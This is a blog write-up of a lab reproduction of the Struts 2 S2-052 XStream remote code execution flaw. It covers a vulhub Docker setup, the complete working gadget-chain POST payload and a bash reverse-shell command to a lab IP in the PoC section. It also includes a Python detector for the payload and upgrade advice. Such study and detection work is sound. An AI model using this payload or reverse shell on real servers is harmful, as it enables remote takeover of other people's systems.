Recurrence of struts 2-052 vulnerability

 

preface

Struts 2 applications are full of holes. Recently I suddenly decided to study the relevant principles and exploitation. The S2-052 vulnerability (CVE-2017-9805) was reported by a security researcher at lgtm.com; it is a remote command execution vulnerability rated Critical. When an application uses the Struts REST plugin with XStream to process XML payloads, it can be subject to remote code execution.

Affected versions: Struts 2.5.12; according to Baidu, version 2.3.33 is also affected.

1. Environment setup

This reproduction uses an Ubuntu system with the environment deployed in Docker. The problems encountered during environment deployment are discussed below.

See the following link for details. Note the difference between docker and docker-compose on Linux.

https://github.com/vulhub/vulhub/blob/master/README.zh-cn.md

Run the following commands to build the lab (target range) environment:

apt install git docker.io docker-compose

git clone https://github.com/vulhub/vulhub.git

cd vulhub/struts2/s2-052/

docker-compose build

docker-compose up -d

Note:

The last step may fail with the error: failed to start docker service: Unit docker.service is masked.

Solution:

systemctl unmask docker.service

systemctl unmask docker.socket

systemctl start docker.service

2. S2-052 reproduction

Check that the environment deployed in step 1 is running by visiting its address in a browser, as shown in the screenshot.

Use Burp Suite to send the payload to the target server. The full POST data, with the points that need attention, is in the following block:

POST /orders HTTP/1.1
Host: 192.168.204.142:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:54.0) Gecko/20100101 Firefox/54.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/xml  # This field needs to be added to the packet header
Content-Length: 2414
Cookie: JSESSIONID=CF855BF35B5C60451837EEC2B4830419
Connection: close
Upgrade-Insecure-Requests: 1

 <map>
   <entry>
     <jdk.nashorn.internal.objects.NativeString>
       <flags>0</flags>
       <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
         <dataHandler>
           <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
             <is class="javax.crypto.CipherInputStream">
               <cipher class="javax.crypto.NullCipher">
                 <initialized>false</initialized>
                 <opmode>0</opmode>
                 <serviceIterator class="javax.imageio.spi.FilterIterator">
                   <iter class="javax.imageio.spi.FilterIterator">
                     <iter class="java.util.Collections$EmptyIterator"/>
                     <next class="java.lang.ProcessBuilder">
                       <command>
                         <string>touch</string>   # the command to execute
                         <string>/tmp/s2-052test.txt</string>   # its argument; each argv element gets its own <string>
                       </command>
                       <redirectErrorStream>false</redirectErrorStream>
                     </next>
                   </iter>
                   <filter class="javax.imageio.ImageIO$ContainsFilter">
                     <method>
                       <class>java.lang.ProcessBuilder</class>
                       <name>start</name>
                       <parameter-types/>
                     </method>
                     <name>foo</name>
                   </filter>
                   <next class="string">foo</next>
                 </serviceIterator>
                 <lock/>
               </cipher>
               <input class="java.lang.ProcessBuilder$NullInputStream"/>
               <ibuffer/>
               <done>false</done>
               <ostart>0</ostart>
               <ofinish>0</ofinish>
               <closed>false</closed>
             </is>
             <consumed>false</consumed>
           </dataSource>
           <transferFlavors/>
         </dataHandler>
         <dataLen>0</dataLen>
       </value>
     </jdk.nashorn.internal.objects.NativeString>
     <jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/>
   </entry>
   <entry>
     <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
     <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
   </entry>
 </map>

HTTP header information

Put the command to execute in the command field

Check the results on the server

3. PoC study

During the experiment I tried to execute other commands, but the vulnerability does not seem to echo any output. After further exploration, I found that the command tag cannot be filled in arbitrarily.

                       <command>
<string>touch</string>
<string>/tmp/s2-052test.txt</string>
                       </command>

Try executing a shell command:

<string>bash</string>
<string>-c</string>
<string>bash -i >&amp;/dev/tcp/192.168.204.135/10101 0>&amp;1</string>
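As an added defensive example (this is not code from the original post), the following Python script inspects raw HTTP requests, such as those a reverse proxy or WAF would log, for the fingerprints of this payload: an XML body posted to the REST plugin that references the XStream gadget classes shown above, and a ProcessBuilder <command> element whose <string> children are the argv the request is trying to run (the one-element-per-<string> structure discussed in the PoC study). The marker list, the request format and the sample requests are assumptions constructed for this example; the malicious sample keeps only the class names and the command element, not the full chain.

```python
import xml.etree.ElementTree as ET

# Class names that appear in the public S2-052 XStream gadget chain (assumed
# marker list). None of them belong in an order or user record submitted by a
# legitimate REST client, so any one of them in a request body is a strong signal.
GADGET_MARKERS = (
    "jdk.nashorn.internal.objects.NativeString",
    "com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data",
    "javax.crypto.CipherInputStream",
    "javax.imageio.spi.FilterIterator",
    "java.lang.ProcessBuilder",
)


def parse_request(raw: str):
    """Split a raw HTTP request into (method, path, headers, body).
    Header names are lower-cased so lookups are case-insensitive."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, _ = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def extract_commands(body: str):
    """Return the argv lists found under <command> elements of any element
    whose class attribute is java.lang.ProcessBuilder, so the alert can say
    what the request tried to run. Malformed XML yields [] instead of raising."""
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        return []
    argvs = []
    for elem in root.iter():
        if elem.get("class") == "java.lang.ProcessBuilder":
            for cmd in elem.findall("command"):
                argvs.append([s.text or "" for s in cmd.findall("string")])
    return argvs


def inspect(raw: str):
    """Classify one request: 'suspicious' if any gadget marker is present,
    otherwise 'clean'. Also records whether the Content-Type would make the
    REST plugin hand the body to XStream (application/xml or text/xml)."""
    method, path, headers, body = parse_request(raw)
    media_type = headers.get("content-type", "").split(";")[0].strip().lower()
    is_xml = media_type in ("application/xml", "text/xml")
    hits = [m for m in GADGET_MARKERS if m in body]
    result = {"method": method, "path": path, "xml": is_xml,
              "markers": hits, "commands": [], "verdict": "clean"}
    if hits:
        result["verdict"] = "suspicious"
        result["commands"] = extract_commands(body)
    return result


# Constructed sample traffic (not captured from a real host).
BENIGN_REQUEST = (
    "POST /orders HTTP/1.1\r\n"
    "Host: struts.lab.example:8080\r\n"
    "Content-Type: application/xml\r\n"
    "\r\n"
    "<order><clientName>Alice</clientName><amount>3</amount></order>"
)

JSON_REQUEST = (
    "POST /orders HTTP/1.1\r\n"
    "Host: struts.lab.example:8080\r\n"
    "Content-Type: application/json\r\n"
    "\r\n"
    '{"clientName": "Bob", "amount": 1}'
)

# Only the marker class names and the command element are kept here; this is
# not a working gadget chain.
SUSPICIOUS_REQUEST = (
    "POST /orders HTTP/1.1\r\n"
    "Host: struts.lab.example:8080\r\n"
    "Content-Type: application/xml\r\n"
    "\r\n"
    "<map><entry><jdk.nashorn.internal.objects.NativeString><flags>0</flags>"
    '<value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">'
    '<next class="java.lang.ProcessBuilder"><command>'
    "<string>touch</string><string>/tmp/s2-052test.txt</string>"
    "</command></next></value></jdk.nashorn.internal.objects.NativeString>"
    "</entry></map>"
)

if __name__ == "__main__":
    for sample in (BENIGN_REQUEST, JSON_REQUEST, SUSPICIOUS_REQUEST):
        r = inspect(sample)
        print(r["verdict"], r["method"], r["path"], r["markers"], r["commands"])
```

Matching on class names catches this specific chain and its close variants but not a different gadget chain, so treat the rule as a detection stopgap: the fix is to upgrade to a Struts release whose XStreamHandler restricts the types XStream may instantiate (2.5.13 and 2.3.34 and later).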

Reference link: https://www.freebuf.com/vuls/147017.html

Tags: security

Posted by cyberRobot on Wed, 11 May 2022 11:27:58 +0300